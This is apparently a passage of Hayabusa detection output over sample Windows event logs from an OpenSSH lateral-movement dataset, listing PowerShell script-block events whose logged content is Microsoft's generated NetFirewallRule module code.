[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' -Alias '*' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 
+09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] 
${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } 
} catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 